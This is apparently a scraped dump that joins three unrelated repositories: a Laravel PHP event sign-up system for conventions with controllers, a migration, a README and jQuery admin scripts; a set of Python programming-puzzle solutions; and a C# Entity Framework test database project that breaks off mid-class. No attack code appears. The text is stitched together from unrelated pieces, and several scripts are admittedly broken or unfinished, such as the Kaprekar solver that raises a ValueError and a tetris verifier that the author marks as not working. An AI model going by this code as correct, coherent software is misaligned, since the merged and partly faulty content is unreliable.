->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$event = $this->event->findOrFail($id);
return View::make('admin.events.show', compact('event'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$event = $this->event->find($id);
if (is_null($event))
{
return Redirect::route('admin.events.index');
}
return View::make('admin.events.edit', compact('event'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), '_method');
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$event = $this->event->find($id);
$event->update($input);
return Redirect::route('admin.events.show', $id);
}
return Redirect::route('admin.events.edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->event->find($id)->delete();
if (Request::ajax())
{
return json_encode(true);
}
else
{
return Redirect::route('admin.events.index')
->with('success', Lang::get('messages.destroy_success', array('model' => ucfirst(Lang::get('labels.event')))));
}
}
/**
* Toggles if event activities are open for sign up
* @param int $event Id of ConEvent to toggle
* @param string $action Wether to open or close event
* @return Response
*/
public function getToggleOpen($event, $action)
{
try
{
$open = $action === 'open' ? true : false;
$message = $action === 'open' ? 'events.success_open' : 'events.success_close';
DB::table('activities')
->where('con_event_id', $event)
->update(array('open' => $open));
$return = Redirect::back()
->with('success', Lang::get($message) );
}
catch(Exception $e) {
return Redirect::back()
->with('error', $e->getMessage());
}
return $return;
}
}
<file_sep><?php
class AdminBaseController extends BaseController
{
/**
* Initializer.
*
* @return void
*/
public function __construct()
{
$this->title = 'Admin';
}
}
<file_sep>bacon ≈
=======
Booking Assistance for Cons.
A system to sign up for events at conventions and conferences.
Built on [Laravel](http://laravel.com/), [Sentry](https://github.com/cartalyst/sentry) and [Twitter Bootstrap](http://getbootstrap.com/).
How to install
--------------
Clone this repo. You need [Composer](http://getcomposer.org/ "Get Composer") for the coming steps.
Copy example settings files in the `app/config/` directory:
`app.example.php` to `app.php`
`database.example.php` to `database.php`
`mail.example.php` to `mail.php`
Set up a database and make the necessary settings in the files above.
Copy example localization file in the `app/lang/en/` directory:
`app.example.php` to `app.php`
Set the name for your app if you want to.
From the command line, run the following commands in your root directory:
`composer install`
`php artisan migrate --package=cartalyst/sentry`
`php artisan config:publish cartalyst/sentry`
`php artisan migrate`
`php artisan db:seed`
To create your first administratior user, run the following command in your root directory, substituting the `<values>` with what you need them to:
`php artisan user:create <email> <password> <name> Admin`
Example:
`php artisan user:create <EMAIL> topsecret "<NAME>" Admin`
Copy the `example.htaccess` to `.htaccess` file and make any necessary changes to reflect your environment:
Set up a virtual host or similar local server, now you're ready to go!
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class PivotConEventProfileFieldTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('con_event_profile_field', function(Blueprint $table) {
$table->increments('id');
$table->integer('con_event_id')->unsigned()->index();
$table->integer('profile_field_id')->unsigned()->index();
$table->boolean('required')->default(false);
// $table->foreign('con_event_id')->references('id')->on('con_events')->onDelete('cascade');
// $table->foreign('profile_field_id')->references('id')->on('profile_fields')->onDelete('cascade');
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('con_event_profile_field');
}
}
<file_sep><?php
class AdminController extends BaseController
{
public function getIndex()
{
return View::make('admin.index');
}
// public function getUsers($id = null)
// {
// $user = User::find($id);
// if ($user) {
// dd($user);
// return View::make('admin.users.edit', compact('user'));
// }
// else {
// $users = User::all();
// return View::make('admin.users.index', compact('users'));
// }
// }
public function getEvents()
{
return View::make('admin.index');
}
}
<file_sep><?php
class ConeventsTableSeeder extends Seeder {
public function run()
{
// Uncomment the below to wipe the table clean before populating
// DB::table('conevents')->truncate();
$conevents = array(
);
// Uncomment the below to run the seeder
// DB::table('conevents')->insert($conevents);
}
}
<file_sep>$(function() {
var $profileFieldForm = $('.form-profileField');
var onStartsAtChange = function onStartsAtChange(event) {
var $ends_at = $('input[name="ends_at"]');
if ($ends_at && $ends_at.val() === '') {
$ends_at.val($(this).val());
}
};
var onDestroyClick = function onDestroyClick(event) {
event.preventDefault();
var $this = $(this),
post_url = $this.attr('href'),
done_url = post_url.replace(post_url.substr(post_url.lastIndexOf('/')), '');
if (confirm(options.lang.confirmDelete))
{
$.ajax({
'url': post_url,
'type': 'post',
data: {
'_method': 'DELETE'
}
})
.done(function(data) {
document.location.href = done_url;
});
}
};
$('a.destroy').on('click', onDestroyClick);
$(".datepicker").datetimepicker({
'dateFormat':'yy-mm-dd'
});
$('input[name="starts_at"]').on('blur', onStartsAtChange);
if ($profileFieldForm.length) {
var $type = $('#type'),
$altFields = $('#field-options, #field-default, #field-relation_table'),
$fieldOptions = $('#field-options'),
$fieldDefault = $('#field-default'),
$fieldRelationTable = $('#field-relation_table'),
onTypeChange = function onTypeChange(event) {
$altFields.toggleClass('hidden', true);
switch ($type.val()) {
case 'relation':
$fieldRelationTable.toggleClass('hidden', false);
break;
case 'option':
case 'checkbox':
case 'select':
case 'multi':
$fieldOptions.toggleClass('hidden', false);
$fieldDefault.toggleClass('hidden', false);
break;
}
};
$type.on('change', onTypeChange);
onTypeChange();
$profileFieldForm.validate($.extend({}, options.validate, {
rules: {
name: {
required: true,
remote: {
url: options.url + "/admin/fields/check",
type: "post",
data: {
name: function() {
return $("#name").val();
},
old: function() {
return $("#_old_name").length ? $( "#_old_name" ).val() : '';
}
}
}
},
relation_table: {
required: 'select[name=type] > option[value=relation]:checked'
},
options: {
required: 'select[name=type] > option[value=option]:checked, select[name=type] > option[value=checkbox]:checked, select[name=type] > option[value=select]:checked, select[name=type] > option[value=select]:checked'
}
}
}));
}
});
|
9b2be0e50e9ee149280cab57e28052902f9f7b17
|
[
"Markdown",
"JavaScript",
"PHP"
] | 52 |
PHP
|
olleolleolle/bacon
|
a0abedd5753458ae8ed25c26821bed6646bfb48e
|
76a21fa14536c9e875be89714cd8d9b8e88f0cf1
|
refs/heads/master
|
<repo_name>Jy411/Dailies<file_sep>/#254 - Atbash Cipher [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/45w6ad/20160216_challenge_254_easy_atbash_cipher/
import string
def initAlphabetDict():
i = 1
alphabetBook = dict()
for alphabet in string.ascii_lowercase:
alphabetBook[i] = alphabet
i += 1
print(alphabetBook)
return alphabetBook
def encrypt(line):
alphabets = initAlphabetDict()
lineList = list(line)
encryptedString = ""
x = ' '
print(lineList)
for char in lineList:
if char == ' ':
encryptedString += x
for currKey, alphabet in alphabets.items():
if char is alphabet:
newChar = alphabets[27 - currKey]
encryptedString += newChar
print(encryptedString)
encrypt('foobar')<file_sep>/#360 - Find The Nearest Aeroplane [Intermediate].py
# https://www.reddit.com/r/dailyprogrammer/comments/8i5zc3/20180509_challenge_360_intermediate_find_the/
from opensky_api import OpenSkyApi
from scipy.spatial import distance
EIFFEL = (48.8584, 2.2945)
JFK = (40.6413, 73.7781)
api = OpenSkyApi()
states = api.get_states()
dist_Eiffel, dist_jfk = [], []
for s in states.states:
origin, callsign, identifier, geo_altitude, = s.origin_country, s.callsign, s.icao24, s.geo_altitude
latitude, longitude = s.latitude, s.longitude
if latitude and longitude:
distanceFromEiffel = distance.euclidean(EIFFEL, (latitude, longitude))
distanceFromJFK = distance.euclidean(JFK, (latitude, longitude))
dist_Eiffel.append((distanceFromEiffel, origin, callsign, identifier, geo_altitude))
dist_jfk.append((distanceFromJFK, origin, callsign, identifier, geo_altitude))
print("Closest to the Eifel Tower:", min(dist_Eiffel, key=lambda f: f[0]))
print("Closest to JFK:", min(dist_jfk, key=lambda f: f[0]))<file_sep>/#294 - Rack Management 1 [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/5go843/20161205_challenge_294_easy_rack_management_1/
# Did not do bonuses
def scrabble(rackTiles, controlWord):
rackTiles = list(rackTiles)
controlWord = list(controlWord)
constructedWord = list()
for letter in controlWord:
for tile in rackTiles:
if letter == tile:
constructedWord.append(letter)
rackTiles.remove(tile)
controlWord = ''.join(controlWord)
constructedWord = ''.join(constructedWord)
if controlWord == constructedWord:
print('true')
else:
print('false')
scrabble("orrpgma", "program")<file_sep>/#76 - Title Case [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/wjzly/7132012_challenge_76_easy_title_case/
def titlecase(input, exception):
words = input.split()
output = [words[0].title()]
for word in words[1:]:
if word.lower() in exception:
output.append(word.lower())
else:
output.append(word.title())
return ' '.join(output)
print(titlecase("This is a hard one", "hard"))<file_sep>/#228 - Letters in Alphabetical Order [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3h9pde/20150817_challenge_228_easy_letters_in/
def letterSort(letter):
unorderedLetter = list(())
for char in letter:
unorderedLetter.append(char)
orderedLetter = unorderedLetter.copy()
orderedLetter.sort()
reversedLetter = unorderedLetter.copy()
reversedLetter.sort(reverse=True)
if unorderedLetter == orderedLetter:
print(letter + " IN ORDER")
elif unorderedLetter == reversedLetter:
print(letter + " IN REVERSE ORDER")
else:
print(letter + " NOT IN ORDER")
wordList = ["billowy", "biopsy", "chinos", "defaced", "chintz", "sponged", "bijoux", "abhors", "fiddle", "begins",
"chimps", "wronged"]
for word in wordList:
letterSort(word)<file_sep>/#354 - Integer Complexity 1 [Easy] Not Optimized.py
# https://old.reddit.com/r/dailyprogrammer/comments/83uvey/20180312_challenge_354_easy_integer_complexity_1/
def findFactors(number):
factorList = list()
sumList = list()
for i in range(1, number + 1):
if number % i is 0:
factorList.append(i)
for num in factorList:
for num2 in factorList:
result = num * num2
if result == number:
sumOfFactors = num + num2
if sumOfFactors not in sumList:
sumList.append(sumOfFactors)
print(number, "=>", min(sumList))
findFactors(4444445)<file_sep>/#287 - Kaprekar Routine [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/56tbds/20161010_challenge_287_easy_kaprekars_routine/
def largestDigit(digit):
numbers = list(map(int, str(digit)))
return max(numbers)
def descendingOrder(digit):
numbers = list(map(int, str(digit)))
numbers.sort(reverse=True)
s = [str(i) for i in numbers]
result = int("".join(s))
return result
def ascendingOrder(digit):
numbers = list(map(int, str(digit)))
numbers.sort()
s = [str(i) for i in numbers]
result = int("".join(s))
return result
def kaprekarRoutine(descNum, ascNum):
num = 0
i = 0
while num != 6174:
num = int(descNum) - int(ascNum)
ascNum = ascendingOrder(num)
descNum = descendingOrder(num)
print(num)
i += 1
print(i)
desc = descendingOrder(5455)
asc = ascendingOrder(5455)
kaprekarRoutine(desc, asc)<file_sep>/#290 - Kaprekar Number [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/5aemnn/20161031_challenge_290_easy_kaprekar_numbers/
# WEIRD ERROR: ValueError: invalid literal for int() with base 10: ''
import math
def kaprekarNumbers(start, end):
for i in range(start, end+1):
num = int(math.pow(i, 2))
numList = [int(num) for num in str(num)]
print(i, numList, len(numList))
secondHalfIndex = int(len(numList)/2)
firstHalfVal = ""
secondHalfVal = ""
for val, digit in enumerate(numList):
if val < secondHalfIndex:
firstHalfVal += "".join(str(digit))
if val >= secondHalfIndex:
secondHalfVal += "".join(str(digit))
print("first:", firstHalfVal, "second:", secondHalfVal)
firstHalfVal = int(firstHalfVal)
# finalVal = int(firstHalfVal.strip()) + int(secondHalfVal.strip())
# print(finalVal)
kaprekarNumbers(1, 55)<file_sep>/#243 - Abundant and Deficient Numbers [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3uuhdk/20151130_challenge_243_easy_abundant_and/
def numType(number):
divisors = list()
sumOfDivisors = 0
for x in range(1, number+1):
if number % x == 0:
divisors.append(x)
for num in divisors:
sumOfDivisors += num
if sumOfDivisors < 2*number:
print(number, "is deficient by", sumOfDivisors-2*number)
elif sumOfDivisors > 2*number:
print(number, "is abundant by", sumOfDivisors-2*number)
else:
print(number, "neither deficient or abundant")
test = [111, 112, 220, 69, 134, 85]
for num in test:
numType(num)
<file_sep>/#273 - Getting a degree [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/4q35ip/20160627_challenge_273_easy_getting_a_degree/
import math
import re
def conversionParser(inputString):
values = re.findall("\d+.\d+|\d+", inputString)
units = re.findall("[a-z][a-z]", inputString)
firstUnit = units[0][0]
secondUnit = units[0][1]
value = values[0]
if value.find("."):
return firstUnit, secondUnit, float(value)
else:
return firstUnit, secondUnit, int(value)
def converter(unit1, unit2, val):
if unit1 is 'd':
radianVal = math.radians(val)
return str(radianVal) + " radians"
elif unit1 is 'r':
degreeVal = math.degrees(val)
return str(degreeVal) + " degrees"
elif unit1 is 'c':
if unit2 is 'f':
fahrenheitVal = (val * 9/5) + 32
return str(fahrenheitVal) + " fahrenheits"
if unit2 is 'k':
kelvinVal = val + 273.15
return str(kelvinVal) + " kelvins"
else:
return "Invalid conversion units"
elif unit1 is 'f':
if unit2 is 'c':
celsiusVal = (val - 32) * 5/9
return str(celsiusVal) + " celsius"
if unit2 is 'k':
kelvinVal = (val - 32) * 5/9 + 273.15
return str(kelvinVal) + " kelvins"
else:
return "Invalid conversion units"
elif unit1 is 'k':
if unit2 is 'c':
celsiusVal = (val - 273.15)
return str(celsiusVal) + " celsius"
if unit2 is 'f':
fahrenheitVal = (val - 273.15) * 9/5 + 32
return str(fahrenheitVal) + " fahrenheits"
else:
return "Invalid conversion units"
conUnit1, conUnit2, currVal = conversionParser("90dr")
print(converter(conUnit1, conUnit2, currVal))<file_sep>/#370 - UPC Check Digits [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/a72sdj/20181217_challenge_370_easy_upc_check_digits/
def checkUPC(UPC_Code):
UPC_CodeList = list()
for num in UPC_Code:
UPC_CodeList.append(int(num))
evenNumSum = 0
oddNumSum = 0
for numIndex, num in enumerate(UPC_CodeList):
if numIndex % 2 is 0:
evenNumSum += num
else:
oddNumSum += num
evenNumSum = evenNumSum * 3
finalSum = evenNumSum + oddNumSum
finalSum = finalSum % 10
if finalSum is not 0:
finalSum = 10 - finalSum
print(finalSum)
checkUPC("04210000526")<file_sep>/#238 - Consonants and Vowels [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3q9vpn/20151026_challenge_238_easy_consonants_and_vowels/
import random
def wordGenerator(cv):
vowels = ["a", "e", "i", "o", "u"]
consonants = ["b", "c", "d", "f", "g", "h", "j", "k", "l", "m", "n",
"p", "q", "r", "s", "t", "v", "w", "x", "y", "z"]
string = list(cv)
newString = ""
for character in string:
if character == 'c':
newString += random.choice(consonants)
elif character == 'C':
newString += (random.choice(consonants)).upper()
elif character == 'v':
newString += random.choice(vowels)
elif character == 'V':
newString += (random.choice(vowels)).upper()
print(newString)
userInput = input("Enter a string(c and v): ")
wordGenerator(userInput)<file_sep>/#272 - What is in the bag [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/4oylbo/20160620_challenge_272_easy_whats_in_the_bag/
tileCount = {
'A': 9, 'B': 2, 'C': 2, 'D': 4, 'E': 12, 'F': 2, 'G': 3, 'H': 2, 'I': 9, 'J': 1, 'K': 1, 'L': 4, 'M': 2,
'N': 6, 'O': 8, 'P': 2, 'Q': 1, 'R': 6, 'S': 4, 'T': 6, 'U': 4, 'V': 2, 'W': 2, 'X': 1, 'Y': 2, 'Z': 1, '_': 2
}
def scrabbleTileCounter(tilesInPlay):
tilesInPlay = list(tilesInPlay)
print(tilesInPlay)
for tile in tilesInPlay:
tileCount[tile] = tileCount[tile] - 1
if tileCount[tile] < 0:
print('Invalid Input. More', tile, '\'s has been taken from the bag than possible.')
exit()
output = {}
for tile, count in tileCount.items():
if count not in output:
output[count] = []
output[count].append(tile)
for key in sorted(output, reverse=True):
print("%s: %s" % (key, ', '.join(sorted(output[key]))))
scrabbleTileCounter('AXHDRUIOR_XHJZUQEE')<file_sep>/#343 - Mozarts Musical Dice [Intermediate] NOT DONE.py
# https://www.reddit.com/r/dailyprogrammer/comments/7i1ib1/20171206_challenge_343_intermediate_mozarts/
import random
musicComposition = open("mozart.txt")
measureList = list()
for line in musicComposition:
line = line.replace("\n", "")
measureList.append(line)
print(measureList)
groupOfMeasures = [measureList[i:i + 3] for i in range(0, len(measureList), 3)]
for group in groupOfMeasures:
print(group)
choice = random.randint(0, len(measureList))
<file_sep>/#79 - Counting Steps [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/wvc21/7182012_challenge_79_easy_counting_in_steps/
import math
def step_count(a, b, step):
difference = b - a
count = difference/(step-1)
numList = []
for i in range(step):
numList.append(a + (i*count))
print(numList)
print(step_count(13.50, -20.75, 3))<file_sep>/#372 - Perfectly Balanced [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/afxxca/20190114_challenge_372_easy_perfectly_balanced/
def isBalanced(userInput):
userInput = list(userInput)
x = 0
y = 0
for char in userInput:
if char is 'x':
x += 1
if char is 'y':
y += 1
if x is y:
return True
else:
return False
print(isBalanced("yyxyxxyxxyyyyxxxyxyx"))<file_sep>/#239 - A Game of Threes [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3r7wxz/20151102_challenge_239_easy_a_game_of_threes/
def gameOfThrees(number):
while number != 1:
if number % 3 == 0:
print("%d 0" % number)
elif number % 3 == 1:
print("%d -1" % number)
number -= 1
elif number % 3 == 2:
print("%d 1" % number)
number += 1
number = number / 3
print(number)
userNum = int(input("Enter a number: "))
gameOfThrees(userNum)<file_sep>/#236 - Random Bag System [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3ofsyb/20151012_challenge_236_easy_random_bag_system/
import random
def tetrisPieces():
pieces = ["O", "I", "S", "Z", "L", "J", "T"]
random.shuffle(pieces)
finalOutput = ""
while len(finalOutput) < 50:
finalOutput += random.choice(pieces)
print(finalOutput)
return finalOutput
# not fully working as intended
def verify(inp):
for i in range(1, 8):
print(i)
chunk = inp[(7*(i-1)):(i*7)]
pieces = ""
print(chunk)
for c in chunk:
if c in pieces:
print('repeat')
else:
pieces += c
verify(tetrisPieces())<file_sep>/#240 - Typoglycemia [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3s4nyq/20151109_challenge_240_easy_typoglycemia/
import re
import random
def typo(sentence):
wordList = re.findall(r'\w+', sentence)
reworkedSentence = ""
for word in wordList:
newWord = ""
newMiddle = ""
firstLetter = word[0]
middleLetters = word[1:(len(word)-1)]
middleList = list(middleLetters)
random.shuffle(middleList)
for char in middleList:
newMiddle += char
lastLetter = word[-1]
newWord += firstLetter
newWord += newMiddle
newWord += lastLetter
reworkedSentence += newWord + " "
print(reworkedSentence)
typo("According to a research team at Cambridge University, " +
"it doesn't matter in what order the letters in a word are, the only important thing is that the first and last letter be in the right place. " +
"The rest can be a total mess and you can still read it without a problem." +
"This is because the human mind does not read every letter by itself, but the word as a whole. " +
"Such a condition is appropriately called Typoglycemia.")
<file_sep>/#364 - Dice Roller [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/8s0cy1/20180618_challenge_364_easy_create_a_dice_roller/
import re
import random
def rollDice(roll):
matchObj = re.match(r'(\d*)d(\d*)', roll)
noOfDice = matchObj.group(1)
diceSize = matchObj.group(2)
print(noOfDice, diceSize)
diceSum = 0
rolls = list()
for i in range(int(noOfDice)):
rollNum = random.randint(1, int(diceSize))
diceSum += rollNum
rolls.append(rollNum)
print(diceSum, ":", rolls)
rollDice('6d4')<file_sep>/#361 - Tally Program [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/8jcffg/20180514_challenge_361_easy_tally_program/
def tally(scoreTrack):
scoreTrack = list(scoreTrack)
print(scoreTrack)
scoreBoard = dict()
for char in scoreTrack:
if (char not in scoreBoard) and (char.islower() is True):
scoreBoard[char] = 0
if char.islower():
scoreBoard[char] += 1
if char.isupper():
if char.lower() not in scoreBoard:
scoreBoard[char.lower()] = 0
scoreBoard[char.lower()] -= 1
print(scoreBoard)
tally("EbAAdbBEaBaaBBdAccbeebaec")
<file_sep>/#275 - Splurthian Chemistry 101 [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/4savyr/20160711_challenge_275_easy_splurthian_chemistry/
def verifySymbol(chemical, symbol):
chemical = list(chemical)
chemical = [x.lower() for x in chemical]
symbol = list(symbol)
if chemical.index(symbol[0].lower()) >= 0:
if chemical.index(symbol[1].lower(), chemical.index(symbol[0].lower())) >= 0:
print(''.join(chemical), ",", ''.join(symbol), "-> true")
else:
print(''.join(chemical), ",", ''.join(symbol), "-> false")
verifySymbol("Venkmine", "Kn")
|
1b4241da7525759f9aa88e81b6df31a4b6b2fa67
|
[
"Python"
] | 22 |
Python
|
Jy411/Dailies
|
6dad3039834ef09bee40c7b47093fb5c5abe17aa
|
64d92c030c829083b3819083a917a4390ce2ce65
|
refs/heads/master
|
<repo_name>williamsriver/SpeechCreative<file_sep>/readme.txt
hello!欢迎使用课堂语音助手,版本号:0.0.1
主要有以下功能:
1、录音功能:
1)双击运行 录音.exe
2)打开后即开始自由录音,直至命令行中出现生成的文本
以及"Press Any Key to Continue"后即可关闭
3)生成的语音文件在同目录下的 example.txt 中
2、生成关键词
1)将生成的文本放到PythonApplication1\text文件夹下
2)用Visaual Studio运行"PythonApplication1.sln"
3)在PythonApplication1\text文件夹下自动生成Look.txt文件,内含文本的关键词
———————————分割线——————————
注:此为此时版本,关键词功能尚未完善,敬请期待0.0.2版本!<file_sep>/PythonApplication1/text/PythonApplication1.py
# 基于TF-IDF算法的关键词抽取
import jieba
import jieba.analyse
f= open('example.txt', mode = 'r' ,encoding='utf-8')
sentence=f.read()
f.close()
keywords = jieba.analyse.extract_tags(sentence, topK=20, withWeight=True, allowPOS=('n','nr','ns'))
# print(type(keywords))
# <class 'list'>
f = open("look.txt", 'a')
f.seek(0)
f.truncate()
for item in keywords: f.write(item[0]+'\n')
f.close()
|
78ecd0bb8fc56181018a711f3d630de255cd18e6
|
[
"Python",
"Text"
] | 2 |
Text
|
williamsriver/SpeechCreative
|
eeb0a88043a9e54bd616425c45440d7e798eb47f
|
92ca67952a9ddc4badebca51747d6b72190b037f
|
refs/heads/master
|
<file_sep>using MyEntity.Entity;
using System.Collections.Generic;
using System.Linq;
using System;
namespace MyEntity.Query
{
public class TestsQuery
{
private static ICollection<Tests> tt;
public static void ShowTests()
{
tt = new List<Tests>
{
new Tests
{
Name = "for .Net students",
Category = ".Net",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 38
},
new Tests
{
Name = "for JS students",
Category = "JS",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 50
},
new Tests
{
Name = "for PHP students",
Category = "PHP",
TimeMax = 30,
ListAsk="What is a HTML?",
Pass = 25
},
new Tests
{
Name = "for DB students",
Category = "DB",
TimeMax = 25,
ListAsk="What is a DataBase?",
Pass = 20
},
};
using (var db = new MyContext())
{
var ak = new List<Ask>
{
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?"
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?"
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a HTML?"
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a DataBase?"
},
};
db.ask.AddRange(ak);
db.test.AddRange(tt);
db.SaveChanges();
Console.WriteLine("Popularity rating questions in tests");
/*var result = db.ask.Select(item => new { Ask = item.NameAsk, CategoryCount = item.Category.Count() });
foreach (var tst in result)
{
Console.WriteLine(tst);
}*/
}
}
}
}
<file_sep>
namespace MyEntity.Entity
{
class DoTest
{
public int DoTestID { get; set; }
public string Name { get; set; }
public int UserID { get; set; }
public int Result { get; set; }
public int Time { get; set; }
public Tests Tests { get; set; }
public Users Users { get; set; }
}
}
<file_sep>using System.Collections.Generic;
namespace MyEntity.Entity
{
class Lecture
{
public int LectureID { get; set; }
public int TeacherID { get; set; }
public string Name { get; set; }
public string Category { get; set; }
public string Discriptions { get; set; }
public ICollection<Teacher> Teacher { get; set; }
public Lecture()
{
this.Teacher = new List<Teacher>();
}
}
}
<file_sep>namespace MyEntity.Migrations
{
using System;
using System.Data.Entity.Migrations;
public partial class fsb : DbMigration
{
public override void Up()
{
CreateTable(
"dbo.Asks",
c => new
{
AskID = c.Int(nullable: false, identity: true),
Category = c.String(),
NameAsk = c.String(),
})
.PrimaryKey(t => t.AskID);
CreateTable(
"dbo.Tests",
c => new
{
TestID = c.Int(nullable: false, identity: true),
Name = c.String(),
Category = c.String(),
ListAsk = c.String(),
TimeMax = c.Int(nullable: false),
Pass = c.Int(nullable: false),
User_UserID = c.Int(),
})
.PrimaryKey(t => t.TestID)
.ForeignKey("dbo.Users", t => t.User_UserID)
.Index(t => t.User_UserID);
CreateTable(
"dbo.Users",
c => new
{
UserID = c.Int(nullable: false, identity: true),
Name = c.String(),
Age = c.Int(nullable: false),
City = c.String(),
University = c.String(),
Category = c.String(),
})
.PrimaryKey(t => t.UserID);
CreateTable(
"dbo.DoTests",
c => new
{
DoTestID = c.Int(nullable: false, identity: true),
Name = c.String(),
UserID = c.Int(nullable: false),
Result = c.Int(nullable: false),
Time = c.Int(nullable: false),
Tests_TestID = c.Int(),
})
.PrimaryKey(t => t.DoTestID)
.ForeignKey("dbo.Tests", t => t.Tests_TestID)
.ForeignKey("dbo.Users", t => t.UserID, cascadeDelete: true)
.Index(t => t.UserID)
.Index(t => t.Tests_TestID);
CreateTable(
"dbo.Categories",
c => new
{
CategoryID = c.Int(nullable: false, identity: true),
Name = c.String(),
})
.PrimaryKey(t => t.CategoryID);
CreateTable(
"dbo.Lectures",
c => new
{
LectureID = c.Int(nullable: false, identity: true),
TeacherID = c.Int(nullable: false),
Name = c.String(),
Category = c.String(),
Discriptions = c.String(),
})
.PrimaryKey(t => t.LectureID);
CreateTable(
"dbo.Teachers",
c => new
{
TeacherID = c.Int(nullable: false, identity: true),
Name = c.String(),
})
.PrimaryKey(t => t.TeacherID);
CreateTable(
"dbo.TestsAsks",
c => new
{
Tests_TestID = c.Int(nullable: false),
Ask_AskID = c.Int(nullable: false),
})
.PrimaryKey(t => new { t.Tests_TestID, t.Ask_AskID })
.ForeignKey("dbo.Tests", t => t.Tests_TestID, cascadeDelete: true)
.ForeignKey("dbo.Asks", t => t.Ask_AskID, cascadeDelete: true)
.Index(t => t.Tests_TestID)
.Index(t => t.Ask_AskID);
CreateTable(
"dbo.TeacherLectures",
c => new
{
Teacher_TeacherID = c.Int(nullable: false),
Lecture_LectureID = c.Int(nullable: false),
})
.PrimaryKey(t => new { t.Teacher_TeacherID, t.Lecture_LectureID })
.ForeignKey("dbo.Teachers", t => t.Teacher_TeacherID, cascadeDelete: true)
.ForeignKey("dbo.Lectures", t => t.Lecture_LectureID, cascadeDelete: true)
.Index(t => t.Teacher_TeacherID)
.Index(t => t.Lecture_LectureID);
}
public override void Down()
{
DropForeignKey("dbo.TeacherLectures", "Lecture_LectureID", "dbo.Lectures");
DropForeignKey("dbo.TeacherLectures", "Teacher_TeacherID", "dbo.Teachers");
DropForeignKey("dbo.Tests", "User_UserID", "dbo.Users");
DropForeignKey("dbo.DoTests", "UserID", "dbo.Users");
DropForeignKey("dbo.DoTests", "Tests_TestID", "dbo.Tests");
DropForeignKey("dbo.TestsAsks", "Ask_AskID", "dbo.Asks");
DropForeignKey("dbo.TestsAsks", "Tests_TestID", "dbo.Tests");
DropIndex("dbo.TeacherLectures", new[] { "Lecture_LectureID" });
DropIndex("dbo.TeacherLectures", new[] { "Teacher_TeacherID" });
DropIndex("dbo.TestsAsks", new[] { "Ask_AskID" });
DropIndex("dbo.TestsAsks", new[] { "Tests_TestID" });
DropIndex("dbo.DoTests", new[] { "Tests_TestID" });
DropIndex("dbo.DoTests", new[] { "UserID" });
DropIndex("dbo.Tests", new[] { "User_UserID" });
DropTable("dbo.TeacherLectures");
DropTable("dbo.TestsAsks");
DropTable("dbo.Teachers");
DropTable("dbo.Lectures");
DropTable("dbo.Categories");
DropTable("dbo.DoTests");
DropTable("dbo.Users");
DropTable("dbo.Tests");
DropTable("dbo.Asks");
}
}
}
<file_sep>using MyEntity.Entity;
using MyEntity.Query;
using System;
namespace MyEntity
{
class Program
{
static void Main(string[] args)
{
UsersQuery.ShowUsers();
TestsQuery.ShowTests();
DoTestQuery.ShowDoTest();
TeacherQuery.ShowTeacher();
Console.ReadKey();
}
}
}
<file_sep>using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
namespace MyEntity.Entity
{
class Tests
{
[Key]
public int TestID { get; set; }
public string Name { get; set; }
public string Category { get; set; }
public string ListAsk { get; set; }
public int TimeMax { get; set; }
public int Pass { get; set; }
public Users User { get; set; }
public ICollection<Ask> Ask { get; set; }
public Tests()
{
this.Ask = new List<Ask>();
}
}
}
<file_sep>using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
namespace MyEntity.Entity
{
class Users
{
[Key]
public int UserID { get; set; }
public string Name { get; set; }
public int Age { get; set; }
public string City { get; set; }
public string University { get; set; }
public string Category { get; set; }
public ICollection<DoTest> DoTest { get; set; }
public Users()
{
this.DoTest = new List<DoTest>();
}
}
}
<file_sep># BSA-ORM
<file_sep>using System.Collections.Generic;
namespace MyEntity.Entity
{
class Teacher
{
public int TeacherID { get; set; }
public string Name { get; set; }
public ICollection<Lecture> Lecture { get; set; }
public Teacher()
{
this.Lecture = new List<Lecture>();
}
}
}
<file_sep>using MyEntity.Entity;
using System;
using System.Collections.Generic;
using System.Data.Entity;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace MyEntity
{
class MyContext : DbContext
{
public MyContext() : base("MyDB")
{
}
public DbSet<Users> user { get; set; }
public DbSet<Tests> test { get; set; }
public DbSet<Ask> ask { get; set; }
public DbSet<DoTest> testdo { get; set; }
